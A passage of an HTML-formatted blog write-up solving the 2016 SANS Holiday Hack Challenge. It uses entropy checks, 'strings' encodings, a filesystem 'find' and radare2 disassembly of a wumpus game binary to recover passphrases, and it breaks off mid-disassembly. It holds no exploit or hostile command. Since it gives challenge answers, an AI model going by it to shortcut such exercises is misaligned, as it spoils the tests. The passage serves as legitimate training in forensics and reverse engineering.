&lt;span class="go"&gt;Foremost finished at Mon Dec 26 00:44:48 2016&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Still nothing... Is this file completely random? Let's use &lt;code&gt;ent&lt;/code&gt; to
measure the entropy of the file:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;$&lt;/span&gt; ent secondhalf.bin
&lt;span class="go"&gt;Entropy = 7.999841 bits per byte.&lt;/span&gt;

&lt;span class="go"&gt;Optimum compression would reduce the size&lt;/span&gt;
&lt;span class="go"&gt;of this 1033943 byte file by 0 percent.&lt;/span&gt;

&lt;span class="go"&gt;Chi square distribution for 1033943 samples is 227.29, and randomly&lt;/span&gt;
&lt;span class="go"&gt;would exceed this value 75.00 percent of the times.&lt;/span&gt;

&lt;span class="go"&gt;Arithmetic mean value of data bytes is 127.4329 (127.5 = random).&lt;/span&gt;
&lt;span class="go"&gt;Monte Carlo value for Pi is 3.145233080 (error 0.12 percent).&lt;/span&gt;
&lt;span class="go"&gt;Serial correlation coefficient is -0.001185 (totally uncorrelated = 0.0).&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;With these kinds of results, we can be pretty sture that this file is random.
The logical thing is to assume that it's some kind of encrypted file. What's
more, by looking at the end of the capture file, we can see some Dropbox LAN
Sync Discovery Protocol:&lt;/p&gt;
&lt;pre class="literal-block"&gt;
{&amp;quot;host_int&amp;quot;: 266670160730277518981342002975279884847, &amp;quot;version&amp;quot;: [2, 0], &amp;quot;displayname&amp;quot;: &amp;quot;&amp;quot;, &amp;quot;port&amp;quot;: 17500, &amp;quot;namespaces&amp;quot;: [1149071040, 1139770785, 1357103393, 1296963687, 1139786665, 1261247053, 1331126254, 1179166992, 1210559602, 1261612467, 1223790038, 1234538553, 1304191898, 1246301403, 1056298300, 1207374239]}
&lt;/pre&gt;
&lt;p&gt;With this, I was pretty sure to have it the jackpot! I spent the whole day
reading documentation on Dropbox attacks, relying on the knowledge of this
&lt;code&gt;host_int&lt;/code&gt; parameter... and a &lt;code&gt;host_id&lt;/code&gt; parameter, which was
impossible to find anywhere. I tried to use the &lt;code&gt;host_int&lt;/code&gt; paramter
directly as a decryption key, with several &lt;code&gt;openssl&lt;/code&gt; algorithm, but, of
course, to no avail.&lt;/p&gt;
&lt;p&gt;In a move of desperation, I went to &lt;a class="reference external" href="https://reddit.com/r/netsec"&gt;/r/netsec&lt;/a&gt;,
in order to find some clue on this particular part (I was weak, I'm sorry).
&lt;a class="reference external" href="https://www.reddit.com/r/netsec/comments/5hmlkj/the_2016_sans_holiday_hack_challenge/db5qoes/"&gt;This comment&lt;/a&gt;
really turned things around:&lt;/p&gt;
&lt;blockquote&gt;
What types of strings does the strings utility look for, by default? #hint&lt;/blockquote&gt;
&lt;p&gt;With this clue, I immediatly found out. By default, &lt;code&gt;strings&lt;/code&gt; looks for
strings with a minimum length of 4, &lt;strong&gt;with a default encoding of 7-bit ASCII&lt;/strong&gt;.
The binary data probably contained a string encoding in another form. I
immediatly tried 16-bit big endian:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;$&lt;/span&gt; strings -e b secondhalf.bin
&lt;span class="hll"&gt;&lt;span class="go"&gt;art2:ttlehelper&lt;/span&gt;
&lt;/span&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;My error here was to assume that the binary data was in fact an encrypted blob.
Anyway, the second half is &lt;code&gt;ttlehelper&lt;/code&gt;.&lt;/p&gt;
&lt;p&gt;Passphrase: &lt;code&gt;santaslittlehelper&lt;/code&gt;.&lt;/p&gt;
&lt;/div&gt;
&lt;div class="section" id="workshop-first-door"&gt;
&lt;h3&gt;&lt;a class="toc-backref" href="#id5"&gt;Workshop, first door&lt;/a&gt;&lt;/h3&gt;
&lt;pre class="literal-block"&gt;
*******************************************************************************
*                                                                             *
* To open the door, find the passphrase file deep in the directories.         *
*                                                                             *
*******************************************************************************
&lt;/pre&gt;
&lt;p&gt;According to the &lt;a class="reference external" href="https://en.wikipedia.org/wiki/Motd_%28Unix%29"&gt;motd&lt;/a&gt;, there
is on the file system a file containing the passphrase to the door. We can
use the &lt;code&gt;find&lt;/code&gt; command to list every file on the file system:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;$&lt;/span&gt; find / -type f &lt;span class="m"&gt;2&lt;/span&gt;&amp;gt; /dev/null &amp;gt; ~/files.txt
&lt;span class="gp"&gt;$&lt;/span&gt; head ~/files.txt
&lt;span class="go"&gt;/home/elf/files.txt&lt;/span&gt;
&lt;span class="go"&gt;/home/elf/.bashrc&lt;/span&gt;
&lt;span class="hll"&gt;&lt;span class="go"&gt;/home/elf/.doormat/. / /\/\\/Don&amp;#39;t Look Here!/You are persistent, aren&amp;#39;t you?/&amp;#39;/key_for_the_door.txt&lt;/span&gt;
&lt;/span&gt;&lt;span class="go"&gt;/home/elf/.profile&lt;/span&gt;
&lt;span class="go"&gt;/home/elf/.bash_logout&lt;/span&gt;
&lt;span class="go"&gt;/etc/hosts&lt;/span&gt;
&lt;span class="go"&gt;/etc/resolv.conf&lt;/span&gt;
&lt;span class="go"&gt;/etc/hostname&lt;/span&gt;
&lt;span class="go"&gt;/etc/shadow&lt;/span&gt;
&lt;span class="go"&gt;/etc/passwd-&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;The higlighted file seems interesting. However, there's a lot of tricky
characters in the path, and tabulation autocomplete is disabled on this
terminal. However, we can use some shell-fu to get the content of the file:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;$&lt;/span&gt; find ~/.doormat -name &lt;span class="s2"&gt;&amp;quot;key_for_the_door.txt&amp;quot;&lt;/span&gt; -exec cat &lt;span class="o"&gt;{}&lt;/span&gt; &lt;span class="se"&gt;\;&lt;/span&gt;
&lt;span class="go"&gt;key: open_sesame&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Passphrase: &lt;code&gt;open_sesame&lt;/code&gt;&lt;/p&gt;
&lt;p&gt;With this passphrase, we can open the door, which gives us access to Santa's
office.&lt;/p&gt;
&lt;/div&gt;
&lt;div class="section" id="santa-s-office"&gt;
&lt;h3&gt;&lt;a class="toc-backref" href="#id6"&gt;Santa's office&lt;/a&gt;&lt;/h3&gt;
&lt;p&gt;When you interact with the terminal in Santa's office, you get greeted by this
prompt:&lt;/p&gt;
&lt;img alt="santa_office_wargames.png" class="align-center" src="/images/sans-christmas-challenge-2016/santa_office_wargames.png" /&gt;
&lt;p&gt;By &lt;a class="reference external" href="https://duckduckgo.com/?q=greetings+professor+falken"&gt;DuckDuckGoing&lt;/a&gt;
this sentence, we can find that it's a &lt;a class="reference external" href="https://en.wikipedia.org/wiki/WarGames"&gt;WarGames&lt;/a&gt;
reference. Now, I haven't seen WarGames (I know, shame on me), but I managed to
find &lt;a class="reference external" href="https://www.youtube.com/watch?v=KXzNo0vR_dU"&gt;a clip&lt;/a&gt; with the
necessary commands:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;    GREETINGS PROFESSOR FALKEN.

&lt;span class="hll"&gt;    Hello.
&lt;/span&gt;
    HOW ARE YOU FEELING TODAY?

&lt;span class="hll"&gt;    I&amp;#39;m fine. How are you?
&lt;/span&gt;
    EXCELLENT, IT&amp;#39;S BEEN A LONG TIME. CAN YOU EXPLAIN THE REMOVAL OF YOUR USER ACCOUNT ON 6
    /23/73?

&lt;span class="hll"&gt;    People sometimes make mistakes.
&lt;/span&gt;
    YES THEY DO. SHALL WE PLAY A GAME?

&lt;span class="hll"&gt;    Love to. How about Global Thermonuclear War?
&lt;/span&gt;
    WOULDN&amp;#39;T YOU PREFER A GOOD GAME OF CHESS?

&lt;span class="hll"&gt;    Later. Let&amp;#39;s play Global Thermonuclear War.
&lt;/span&gt;
    FINE

    ,------~~v,_         _                     _--^\
     |&amp;#39;          \   ,__/ ||                 _/    /,_ _
    /             \,/     /         ,,  _,,/^         v v-___
    |                    /          |&amp;#39;~^                     \
    \                   |         _/                     _ _/^
     \                 /         /                   ,~~^/ |
      ^~~_       _ _   /          |          __,, _v__\   \/
          &amp;#39;~~,  , ~ \ \           ^~       /    ~   //
              \/     \/             \~,  ,/
                                       ~~
       UNITED STATES                   SOVIET UNION
    WHICH SIDE DO YOU WANT?
         1.    UNITED STATES
         2.    SOVIET UNION
    PLEASE CHOOSE ONE:
&lt;span class="hll"&gt;    2
&lt;/span&gt;
    AWAITING FIRST STRIKE COMMAND
    -----------------------------
    PLEASE LIST PRIMARY TARGETS BY
CITY AND/OR COUNTRY NAME:

&lt;span class="hll"&gt;Las Vegas
&lt;/span&gt;
LAUNCH INITIATED, HERE&amp;#39;S THE KEY FOR YOUR TROUBLE:
LOOK AT THE PRETTY LIGHTS
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Passphrase: &lt;code&gt;LOOK AT THE PRETTY LIGHTS&lt;/code&gt;&lt;/p&gt;
&lt;p&gt;With this passphrase, you can access a new room called the corridor.&lt;/p&gt;
&lt;/div&gt;
&lt;div class="section" id="the-corridor"&gt;
&lt;h3&gt;&lt;a class="toc-backref" href="#id7"&gt;The corridor&lt;/a&gt;&lt;/h3&gt;
&lt;p&gt;There's no terminal in this room, only a password protected door. Let's put
a pin on this for now.&lt;/p&gt;
&lt;img alt="the_corridor_password_protected.png" class="align-center" src="/images/sans-christmas-challenge-2016/the_corridor_password_protected.png" /&gt;
&lt;/div&gt;
&lt;div class="section" id="workshop-second-door"&gt;
&lt;h3&gt;&lt;a class="toc-backref" href="#id8"&gt;Workshop, second door&lt;/a&gt;&lt;/h3&gt;
&lt;pre class="literal-block"&gt;
*******************************************************************************
*                                                                             *
* Find the passphrase from the wumpus. Play fair or cheat; it's up to you.    *
*                                                                             *
*******************************************************************************
&lt;/pre&gt;
&lt;p&gt;On this terminal, we have a kind of game, looking a lot like &lt;a class="reference external" href="https://en.wikipedia.org/wiki/Hunt_the_Wumpus"&gt;Hunt the Wumpus&lt;/a&gt;, where we have to go
down a dungeon, slay the wumpus, and get the passphrase from it.&lt;/p&gt;
&lt;img alt="wumpus_launch.png" class="align-center" src="/images/sans-christmas-challenge-2016/wumpus_launch.png" /&gt;
&lt;p&gt;However, instead of playing the game, we chan cheat, as the motd suggests, by
analyzing the binary to extract the passphrase. We can extract the
&lt;code&gt;wumpus&lt;/code&gt; binary by base64-encoding it on the board, copying the result,
then base64-decoding it on our analysis machine. You can get a copy of the
executable &lt;a class="reference external" href="/docs/sans-christmas-challenge-2016/wumpus"&gt;here&lt;/a&gt; (sha256:
&lt;code&gt;10412d7773a5d3a49e5a5facdc5aa386a4e3eaec7dca83bc769a104e1790c1fd&lt;/code&gt;).&lt;/p&gt;
&lt;p&gt;If we look at the list of functions we can see one called &lt;code&gt;kill_wump&lt;/code&gt;. By
looking at the disassembly of this function, using radare2 (God, I've got to
learn how to use this tool, there seems to be a steep learning curve!), we can
see that this function is called when you managed to kill the wumpus, and gives
you the passphrase:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="go"&gt;[0x00605118]&amp;gt; pdf @ fcn.kill_wump&lt;/span&gt;
&lt;span class="go"&gt;/ (fcn) fcn.kill_wump 546&lt;/span&gt;
&lt;span class="go"&gt;|   fcn.kill_wump ();&lt;/span&gt;
&lt;span class="go"&gt;|           ; var int local_8h @ rbp-0x8&lt;/span&gt;
&lt;span class="go"&gt;|           0x00402644      55             push rbp&lt;/span&gt;
&lt;span class="go"&gt;|           0x00402645      4889e5         mov rbp, rsp&lt;/span&gt;
&lt;span class="go"&gt;|           0x00402648      4883ec10       sub rsp, 0x10&lt;/span&gt;
&lt;span class="go"&gt;|           0x0040264c      bf38354000     mov edi, str._thwock____groan___crash__n_nA_horrible_roar_fills_the_cave__and_you_realize__with_a_smile__that_you_nhave_slain_the_evil_Wumpus_and_won_the_game___You_don_t_want_to_tarry_for_nlong__however__because_not_only_is_the_Wumpus_famous__but_the_stench_of_ndead_Wumpus_is_also_quite_well_known__a_stench_plenty_enough_to_slay_the_nmightiest_adventurer_at_a_single_whiff__ ; &amp;quot;*thwock!* *groan* *crash*..A horrible roar fills the cave, and you realize, with a smile, that you.have slain the evil Wumpus and won the game!  You don&amp;#39;t want to tarry for.long, however, because not only is the Wumpus famous, but the stench of.dead Wumpus is also quite well known, a stench plenty enough to slay the.mightiest adventurer at a single whiff!!&amp;quot; @ 0x403538&lt;/span&gt;
&lt;span class="go"&gt;|           0x00402651      e85ae4ffff     call sym.imp.puts          ; int puts(const char *s);&lt;/span&gt;
&lt;span class="go"&gt;|           0x00402656      bf18000000     mov edi, 0x18               ; &amp;quot;0.@&amp;quot;&lt;/span&gt;
&lt;span class="go"&gt;|           0x0040265b      e8f0e4ffff     call sym.imp.malloc        ;  void *malloc(size_t size);&lt;/span&gt;
&lt;span class="go"&gt;|           0x00402660      488945f8       mov qword [rbp - local_8h], rax&lt;/span&gt;
&lt;span class="go"&gt;|           0x00402664      488b05cd2a20.  mov rax, qword [obj.m4]     ; [0x605138:8]=0x402a08 str.When_you_want_to_know_how_things_really_work__study_them_when_they_re_coming_apart LEA obj.m4 ; obj.m4&lt;/span&gt;
&lt;span class="go"&gt;|           0x0040266b      0fb65009       movzx edx, byte [rax + 9]   ; [0x9:1]=0&lt;/span&gt;
&lt;span class="go"&gt;|           0x0040266f      488b45f8       mov rax, qword [rbp - local_8h]&lt;/span&gt;
&lt;span class="go"&gt;|           0x00402673      8810           mov byte [rax], dl&lt;/span&gt;
&lt;span class="go"&gt;|           0x00402675      488b45f8       mov rax, qword [rbp - local_8h]&lt;/span&gt;
&lt;span class="go"&gt;|           0x00402679      488d5001       lea rdx, [rax + 1]          ; 0x1&lt;/span&gt;
&lt;span class="go"&gt;|           0x0040267d      488b05bc2a20.  mov rax, qword [obj.m5]     ; [0x605140:8]=0x402a60 str.We_have_no_future_because_our_present_is_too_volatile._We_have_only_risk_management. LEA obj.m5 ; &amp;quot;`*@&amp;quot; @ 0x605140&lt;/span&gt;
&lt;span class="go"&gt;|           0x00402684      0fb6400e       movzx eax, byte [rax + 0xe] ; [0xe:1]=0&lt;/span&gt;
&lt;span class="go"&gt;|           0x00402688      8802           mov byte [rdx], al&lt;/span&gt;
&lt;span class="go"&gt;|           0x0040268a      488b45f8       mov rax, qword [rbp - local_8h]&lt;/span&gt;
&lt;span class="go"&gt;|           0x0040268e      488d5002       lea rdx, [rax + 2]          ; 0x2&lt;/span&gt;
&lt;span class="go"&gt;|           0x00402692      488b059f2a20.  mov rax, qword [obj.m4]     ; [0x605138:8]=0x402a08 str.When_you_want_to_know_how_things_really_work__study_them_when_they_re_coming_apart LEA obj.m4 ; obj.m4&lt;/span&gt;
&lt;span class="go"&gt;|           0x00402699      0fb64037       movzx eax, byte [rax + 0x37] ; [0x37:1]=0 ; &amp;#39;7&amp;#39;&lt;/span&gt;
&lt;span class="go"&gt;|           0x0040269d      8802           mov byte [rdx], al&lt;/span&gt;
&lt;span class="go"&gt;|           0x0040269f      488b45f8       mov rax, qword [rbp - local_8h]&lt;/span&gt;
&lt;span class="go"&gt;|           0x004026a3      488d5003       lea rdx, [rax + 3]          ; 0x3&lt;/span&gt;
&lt;span class="go"&gt;|           0x004026a7      488b05722a20.  mov rax, qword [obj.m0]     ; [0x605120:8]=0x402970 str.The_sky_above_the_port_was_the_color_of_television__tuned_to_a_dead_channel. LEA obj.m0 ; &amp;quot;p)@&amp;quot; @ 0x605120&lt;/span&gt;
&lt;span class="go"&gt;|           0x004026ae      0fb64012       movzx eax, byte [rax + 0x12] ; [0x12:1]=62&lt;/span&gt;
&lt;span class="go"&gt;|           0x004026b2      8802           mov byte [rdx], al&lt;/span&gt;
&lt;span class="go"&gt;|           0x004026b4      488b45f8       mov rax, qword [rbp - local_8h]&lt;/span&gt;
&lt;span class="go"&gt;|           0x004026b8      488d5004       lea rdx, [rax + 4]          ; 0x4&lt;/span&gt;
&lt;span class="go"&gt;|           0x004026bc      488b05852a20.  mov rax, qword [obj.m6]     ; [0x605148:8]=0x402ab8 str.Stand_high_long_enough_and_your_lightning_will_come. LEA obj.m6 ; obj.m6&lt;/span&gt;
&lt;span class="go"&gt;|           0x004026c3      0fb6401d       movzx eax, byte [rax + 0x1d] ; [0x1d:1]=0&lt;/span&gt;
&lt;span class="go"&gt;|           0x004026c7      8802           mov byte [rdx], al&lt;/span&gt;
&lt;span class="go"&gt;|           0x004026c9      488b45f8       mov rax, qword [rbp - local_8h]&lt;/span&gt;
&lt;span class="go"&gt;|           0x004026cd      488d5005       lea rdx, [rax + 5]          ; 0x5&lt;/span&gt;
&lt;span class="go"&gt;|           0x004026d1      488b05582a20.  mov rax, qword [obj.m2]     ; [0x605130:8]=0x4029d8 str.The_street_finds_its_own_uses_for_things. LEA obj.m2 ; obj.m2&lt;/span&gt;
&lt;span class="go"&gt;|           0x004026d8      0fb64004       movzx eax, byte [rax + 4]   ; [0x4:1]=2&lt;/span&gt;
&lt;span class="go"&gt;|           0x004026dc      8802           mov byte [rdx], al&lt;/span&gt;
&lt;span class="go"&gt;|           0x004026de      488b45f8       mov rax, qword [rbp - local_8h]&lt;/span&gt;
&lt;span class="go"&gt;|           0x004026e2      488d5006       lea rdx, [rax + 6]          ; 0x6&lt;/span&gt;
&lt;span class="go"&gt;|           0x004026e6      488b055b2a20.  mov rax, qword [obj.m6]     ; [0x605148:8]=0x402ab8 str.Stand_high_long_enough_and_your_lightning_will_come. LEA obj.m6 ; obj.m6&lt;/span&gt;
&lt;span class="go"&gt;|           0x004026ed      0fb64016       movzx eax, byte [rax + 0x16] ; [0x16:1]=0&lt;/span&gt;
&lt;span class="go"&gt;|           0x004026f1      8802           mov byte [rdx], al&lt;/span&gt;
&lt;span class="go"&gt;|           0x004026f3      488b45f8       mov rax, qword [rbp - local_8h]&lt;/span&gt;
&lt;span class="go"&gt;|           0x004026f7      488d5007       lea rdx, [rax + 7]          ; 0x7&lt;/span&gt;
&lt;span class="go"&gt;|           0x004026fb      488b05262a20.  mov rax, qword [obj.m1]     ; [0x605128:8]=0x4029bd str.Pattern_Recognition. LEA obj.m1 ; obj.m1&lt;/span&gt;
&lt;span class="go"&gt;|           0x00402702      0fb6400e       movzx eax, byte [rax + 0xe] ; [0xe:1]=0&lt;/span&gt;
&lt;span class="go"&gt;|           0x00402706      8802           mov byte [rdx], al&lt;/span&gt;
&lt;span class="go"&gt;|           0x00402708      488b45f8       mov rax, qword [rbp - local_8h]&lt;/span&gt;
&lt;span class="go"&gt;|           0x0040270c      488d5008       lea rdx, [rax + 8]          ; 0x8&lt;/span&gt;
&lt;span class="go"&gt;|           0x00402710      488b05212a20.  mov rax, qword [obj.m4]     ; [0x605138:8]=0x402a08 str.When_you_want_to_know_how_things_really_work__study_them_when_they_re_coming_apart LEA obj.m4 ; obj.m4&lt;/span&gt;
&lt;span class="go"&gt;|           0x00402717      0fb6402e       movzx eax, byte [rax + 0x2e] ; [0x2e:1]=0 ; &amp;#39;.&amp;#39;&lt;/span&gt;
&lt;span class="go"&gt;|           0x0040271b      8802           mov byte [rdx], al&lt;/span&gt;
&lt;span class="go"&gt;|           0x0040271d      488b45f8       mov rax, qword [rbp - local_8h]&lt;/span&gt;
&lt;span class="go"&gt;|           0x00402721      488d5009       lea rdx, [rax + 9]          ; 0x9&lt;/span&gt;
&lt;span class="go"&gt;|           0x00402725      488b05142a20.  mov rax, qword [obj.m5]     ; [0x605140:8]=0x402a60 str.We_have_no_future_because_our_present_is_too_volatile._We_have_only_risk_management. LEA obj.m5 ; &amp;quot;`*@&amp;quot; @ 0x605140&lt;/span&gt;
&lt;span class="go"&gt;|           0x0040272c      0fb64007       movzx eax, byte [rax + 7]   ; [0x7:1]=0&lt;/span&gt;
&lt;span class="go"&gt;|           0x00402730      8802           mov byte [rdx], al&lt;/span&gt;
&lt;span class="go"&gt;|           0x00402732      488b45f8       mov rax, qword [rbp - local_8h]&lt;/span&gt;
&lt;span class="go"&gt;|           0x00402736      488d500a       lea rdx, [rax + 0xa]        ; 0xa&lt;/span&gt;
&lt;span class="go"&gt;|           0x0040273a      488b05ff2920.  mov rax, qword [obj.m5]     ; [0x605140:8]=0x402a60 str.We_have_no_future_because_our_present_is_too_volatile._We_have_only_risk_management. LEA obj.m5 ; &amp;quot;`*@&amp;quot; @ 0x605140&lt;/span&gt;
&lt;span class="go"&gt;|           0x00402741      0fb64049       movzx eax, byte [rax + 0x49] ; [0x49:1]=0 ; &amp;#39;I&amp;#39;&lt;/span&gt;
&lt;span class="go"&gt;|           0x00402745      8802           mov byte [rdx], al&lt;/span&gt;
&lt;span class="go"&gt;|           0x00402747      488b45f8       mov rax, qword [rbp - local_8h]&lt;/span&gt;
&lt;span class="go"&gt;|           0x0040274b      488d500b       lea rdx, [rax + 0xb]        ; 0xb&lt;/span&gt;
&lt;span class="go"&gt;|           0x0040274f      488b05f22920.  mov rax, qword [obj.m6]     ; [0x605148:8]=0x402ab8 str.Stand_high_long_enough_and_your_lightning_will_come. LEA obj.m6 ; obj.m6&lt;/span&gt;
&lt;span class="go"&gt;|           0x00402756      0fb64007       movzx eax, byte [rax + 7]   ; [0x7:1]=0&lt;/span&gt;
&lt;span class="go"&gt;|           0x0040275a      8802           mov byte [rdx], al&lt;/span&gt;
&lt;span class="go"&gt;|           0x0040275c      488b45f8       mov rax, qword [rbp - local_8h]&lt;/span&gt;
&lt;span class="go"&gt;|           0x00402760      488d500c       lea rdx, [rax + 0xc]        ; 0xc&lt;/span&gt;
&lt;span class="go"&gt;|           0x00402764      488b05c52920.  mov rax, qword [obj.m2]     ; [0x605130:8]=0x4029d8 str.The_street_finds_its_own_uses_for_things. LEA obj.m2 ; obj.m2&lt;/span&gt;
&lt;span class="go"&gt;|           0x0040276b      0fb64004       movzx eax, byte [rax + 4]   ; [0x4:1]=2&lt;/span&gt;
&lt;span class="go"&gt;|           0x0040276f      8802           mov byte [rdx], al&lt;/span&gt;
&lt;span class="go"&gt;|           0x00402771      488b45f8       mov rax, qword [rbp - local_8h]&lt;/span&gt;
&lt;span class="go"&gt;|           0x00402775      488d500d       lea rdx, [rax + 0xd]        ; 0xd&lt;/span&gt;
&lt;span class="go"&gt;|           0x00402779      488b05b82920.  mov rax, qword [obj.m4]     ; [0x605138:8]=0x402a08 str.When_you_want_to_know_how_things_really_work__study_them_when_they_re_coming_apart LEA obj.m4 ; obj.m4&lt;/span&gt;
&lt;span class="go"&gt;|           0x00402780      0fb64007       movzx eax, byte [rax + 7]   ; [0x7:1]=0&lt;/span&gt;
&lt;span class="go"&gt;|           0x00402784      8802           mov byte [rdx], al&lt;/span&gt;
&lt;span class="go"&gt;|           0x00402786      488b45f8       mov rax, qword [rbp - local_8h]&lt;/span&gt;
&lt;span class="go"&gt;|           0x0040278a      488d500e       lea rdx, [rax + 0xe]        ; 0xe&lt;/span&gt;
&lt;span class="go"&gt;|           0x0040278e      488b05b32920.  mov rax, qword [obj.m6]     ; [0x605148:8]=0x402ab8 str.Stand_high_long_enough_and_your_lightning_will_come. LEA obj.m6 ; obj.m6&lt;/span&gt;
&lt;span class="go"&gt;|           0x00402795      0fb64003       movzx eax, byte [rax + 3]   ; [0x3:1]=70&lt;/span&gt;
&lt;span class="go"&gt;|           0x00402799      8802           mov byte [rdx], al&lt;/span&gt;
&lt;span class="go"&gt;|           0x0040279b      488b45f8       mov rax, qword [rbp - local_8h]&lt;/span&gt;
&lt;span class="go"&gt;|           0x0040279f      488d500f       lea rdx, [rax + 0xf]        ; 0xf&lt;/span&gt;
&lt;span class="go"&gt;|           0x004027a3      488b056e2920.  mov rax, qword [obj.m3]     ; [0x605118:8]=0x402958 str.0123456789abcdef LEA obj.m3 ; &amp;quot;X)@&amp;quot; @ 0x605118&lt;/span&gt;
&lt;span class="go"&gt;|           0x004027aa      0fb6400d       movzx eax, byte [rax + 0xd] ; [0xd:1]=0&lt;/span&gt;
&lt;span class="go"&gt;|           0x004027ae      8802           mov byte [rdx], al&lt;/span&gt;
&lt;span class="go"&gt;|           0x004027b0      488b45f8       mov rax, qword [rbp - local_8h]&lt;/span&gt;
&lt;span class="go"&gt;|           0x004027b4      488d5010       lea rdx, [rax + 0x10]       ; 0x10&lt;/span&gt;
&lt;span class="go"&gt;|           0x004027b8      488b05592920.  mov rax, qword [obj.m3]     ; [0x605118:8]=0x402958 str.0123456789abcdef LEA obj.m3 ; &amp;quot;X)@&amp;quot; @ 0x605118&lt;/span&gt;
&lt;span class="go"&gt;|           0x004027bf      0fb6400e       movzx eax, byte [rax + 0xe] ; [0xe:1]=0&lt;/span&gt;
&lt;span class="go"&gt;|           0x004027c3      8802           mov byte [rdx], al&lt;/span&gt;
&lt;span class="go"&gt;|           0x004027c5      488b45f8       mov rax, qword [rbp - local_8h]&lt;/span&gt;
&lt;span class="go"&gt;|           0x004027c9      488d5011       lea rdx, [rax + 0x11]       ; 0x11&lt;/span&gt;
&lt;span class="go"&gt;|           0x004027cd      488b055c2920.  mov rax, qword [obj.m2]     ; [0x605130:8]=0x4029d8 str.The_street_finds_its_own_uses_for_things. LEA obj.m2 ; obj.m2&lt;/span&gt;
&lt;span class="go"&gt;|           0x004027d4      0fb64006       movzx eax, byte [rax + 6]   ; [0x6:1]=1&lt;/span&gt;
&lt;span class="go"&gt;|           0x004027d8      8802           mov byte [rdx], al&lt;/span&gt;
&lt;span class="go"&gt;|           0x004027da      488b45f8       mov rax, qword [rbp - local_8h]&lt;/span&gt;
&lt;span class="go"&gt;|           0x004027de      488d5012       lea rdx, [rax + 0x12]       ; 0x12 ; &amp;quot;&amp;gt;&amp;quot;&lt;/span&gt;
&lt;span class="go"&gt;|           0x004027e2      488b055f2920.  mov rax, qword [obj.m6]     ; [0x605148:8]=0x402ab8 str.Stand_high_long_enough_and_your_lightning_will_come. LEA obj.m6 ; obj.m6&lt;/span&gt;
&lt;span class="go"&gt;|           0x004027e9      0fb600         movzx eax, byte [rax]&lt;/span&gt;
&lt;span class="go"&gt;|           0x004027ec      8802           mov byte [rdx], al&lt;/span&gt;
&lt;span class="go"&gt;|           0x004027ee      488b45f8       mov rax, qword [rbp - local_8h]&lt;/span&gt;
&lt;span class="go"&gt;|           0x004027f2      488d5013       lea rdx, [rax + 0x13]       ; 0x13&lt;/span&gt;
&lt;span class="go"&gt;|           0x004027f6      488b05232920.  mov rax, qword [obj.m0]     ; [0x605120:8]=0x402970 str.The_sky_above_the_port_was_the_color_of_television__tuned_to_a_dead_channel. LEA obj.m0 ; &amp;quot;p)@&amp;quot; @ 0x605120&lt;/span&gt;
&lt;span class="go"&gt;|           0x004027fd      0fb600         movzx eax, byte [rax]&lt;/span&gt;
&lt;span class="go"&gt;|           0x00402800      8802           mov byte [rdx], al&lt;/span&gt;
&lt;span class="go"&gt;|           0x00402802      488b45f8       mov rax, qword [rbp - local_8h]&lt;/span&gt;
&lt;span class="go"&gt;|           0x00402806      488d5014       lea rdx, [rax + 0x14]       ; 0x14&lt;/span&gt;
&lt;span class="go"&gt;|           0x0040280a      488b05272920.  mov rax, qword [obj.m4]     ; [0x605138:8]=0x402a08 str.When_you_want_to_know_how_things_really_work__study_them_when_they_re_coming_apart LEA obj.m4 ; obj.m4&lt;/span&gt;
&lt;span class="go"&gt;|           0x00402811      0fb64006       movzx eax, byte [rax + 6]   ; [0x6:1]=1&lt;/span&gt;
&lt;span class="go"&gt;|           0x00402815      8802           mov byte [rdx], al&lt;/span&gt;
&lt;span class="go"&gt;|           0x00402817      488b45f8       mov rax, qword [rbp - local_8h]&lt;/span&gt;
&lt;span class="go"&gt;|           0x0040281b      488d5015       lea rdx, [rax + 0x15]       ; 0x15&lt;/span&gt;
&lt;span class="go"&gt;|           0x0040281f      488b05fa2820.  mov rax, qword [obj.m0]     ; [0x605120:8]=0x402970 str.The_sky_above_the_port_was_the_color_of_television__tuned_to_a_dead_channel. LEA obj.m0 ; &amp;quot;p)@&amp;quot; @ 0x605120&lt;/span&gt;
&lt;span class="go"&gt;|           0x00402826      0fb6400a       movzx eax, byte [rax + 0xa] ; [0xa:1]=0&lt;/span&gt;
&lt;span class="go"&gt;|           0x0040282a      8802           mov byte [rdx], al&lt;/span&gt;
&lt;span class="go"&gt;|           0x0040282c      488b45f8       mov rax, qword [rbp - local_8h]&lt;/span&gt;
&lt;span class="go"&gt;|           0x00402830      488d5016       lea rdx, [rax + 0x16]       ; 0x16&lt;/span&gt;
&lt;span class="go"&gt;|           0x00402834      488b050d2920.  mov rax, qword [obj.m6]     ; [0x605148:8]=0x402ab8 str.Stand_high_long_enough_and_your_lightning_will_come. LEA obj.m6 ; obj.m6&lt;/span&gt;
&lt;span class="go"&gt;|           0x0040283b      0fb64004       movzx eax, byte [rax + 4]   ; [0x4:1]=2&lt;/span&gt;
&lt;span class="go"&gt;|           0x0040283f      8802           mov byte [rdx], al&lt;/span&gt;
&lt;span class="go"&gt;|           0x00402841      488b45f8       mov rax, qword [rbp - local_8h]&lt;/span&gt;
&lt;span class="go"&gt;|           0x00402845      4889c7         mov rdi, rax&lt;/span&gt;
&lt;span class="go"&gt;|           0x00402848      e861f6ffff     call sym.to_upper&lt;/span&gt;
&lt;span class="go"&gt;|           0x0040284d      bf9f364000     mov edi, str._nPassphrase:  ; str._nPassphrase:&lt;/span&gt;
